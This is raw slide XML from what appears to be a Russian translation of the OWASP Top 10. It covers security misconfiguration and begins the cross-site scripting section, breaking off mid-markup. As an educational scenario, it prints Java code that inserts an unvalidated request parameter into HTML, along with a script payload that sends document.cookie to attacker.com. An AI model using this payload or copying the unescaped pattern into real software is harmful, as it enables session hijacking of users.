              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (например, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Struts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Spring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, ASP.NET), библиотек и т. п.;</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сервер не использует безопасные заголовки или директивы, а также если они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ПО устарело или имеет уязвимости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sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Без организованной и регулярно выполняемой проверки безопасности приложений системы подвержены большему риску.</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5"/>
              </a:rPr>
              <a:t>Руководство OWASP по тестированию: Управление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Коды ошибок</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7"/>
              </a:rPr>
              <a:t>Проект OWASP: Безопасные заголовки</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Для получения дополнительной информации по данной теме см. "Стандарт подтверждения безопасности приложений (ASVS): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>V19 Конфигурация</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="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r>
              <a:rPr lang="ru-RU" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Сторонние</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" b="1"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9"/>
              </a:rPr>
              <a:t>Руководство NIST по повышению безопасности серверов</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0"/>
              </a:rPr>
              <a:t>CWE-2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Уязвимости, связанные со средой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1"/>
              </a:rPr>
              <a:t>CWE-16: Уязвимости, связанные с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2"/>
              </a:rPr>
              <a:t>CWE-388: Уязвимости, связанные с обработкой ошибок</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3"/>
              </a:rPr>
              <a:t>Руководства/стандарты CIS по настройке безопасности</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4"/>
              </a:rPr>
              <a:t>Обнаружение и перечисление контейнеров </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>Amazon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t> S3</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lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Необходимо реализовать процесс безопасной установки, включая:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>воспроизводимость</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> процессов для быстрого создания </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>безопасных, изолированных сред. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Среды для разработки, контроля качества и </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>эксплуатации должны </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>быть настроены одинаково, но иметь разные учетные данные. Процессы должны быть автоматизированы для минимизации затрат на создание новых безопасных сред;</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платформ только с необходимым набором функций, компонентов, документации и образцов. Удалите или не устанавливайте лишние компоненты или </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>фреймворки</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проверку и актуализацию параметров настройки безопасности в соответствии с выпускаемыми бюллетенями, обновлениями и исправлениями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 а также проверку разрешений облачных хранилищ (например, для контейнеров S3); </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создание сегментированной архитектуры приложения, обеспечивающей эффективное разграничение компонентов или клиентов с помощью контейнеризации или облачных групп безопасности;</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безопасных директив для клиентов, например, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Безопасных заголовков</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автоматизацию проверки эффективности используемых конфигураций и настроек во всех средах.</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A6</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Некорректная настройка параметров </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>безопасности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9436027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ct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="830" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Злоумышленники часто пытаются эксплуатировать неисправленные уязвимости, настроенные по умолчанию учетные записи, неиспользуемые страницы, незащищенные файлы и каталоги для получения несанкционированного доступа или информации о системе.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ru-RU" sz="770" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Настройка безопасности может быть выполнена некорректно на любом уровне приложения, включая сетевые службы, платформы, веб-службы, сервер, базу данных, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="770" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>фреймворки</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="770" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, код, а также предустановленные виртуальные машины, контейнеры или хранилища. Для поиска уязвимых настроек, настроенных по умолчанию учетных записей, неиспользуемых служб, устаревших параметров и т. п. можно использовать автоматизированные сканеры.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Подобные уязвимости позволяют злоумышленникам получить несанкционированный доступ к системным данным или функциям, а также могут привести к полной компрометации системы. </a:t>
                      </a:r>
                    </a:p>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3882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45655"/>
            <a:ext cx="628650" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId17"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3101250" y="1078750"/>
            <a:ext cx="723900" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5499230" y="1151620"/>
            <a:ext cx="628650" cy="190500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId19"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8620" y="1511660"/>
            <a:ext cx="990600" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId20"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5846115" y="1511659"/>
            <a:ext cx="990600" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Сценарий №1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Приложение использует непроверенные данные при создании HTML-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>сниппета</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> без их подтверждения или </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>преобразования:</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU"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String</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page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> += "&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>input</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name</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err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>creditcard</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type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>='TEXT'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:b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value</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 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("CC") + "</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sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Злоумышленник меняет параметр 'CC' в браузере на:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pP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&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.location</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a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:b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http://www.attacker.com/cgi-bin/cookie.cgi?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:b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foo</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err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Идентификатор сессии жертвы отправляется на сайт злоумышленника, позволяя атакующему перехватить текущую сессию пользователя. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Примечание:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> злоумышленник может использовать XSS для обхода защиты от межсайтовой подмены запросов (CSRF), используемой в приложении.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Существует три типа XSS, обычно эксплуатируемых в браузерах:</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Отраженное </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>межсайтовое выполнение сценариев (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="770" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reflected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="770" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="770" b="1" dirty="0" smtClean="0">
                <a:solidFill>
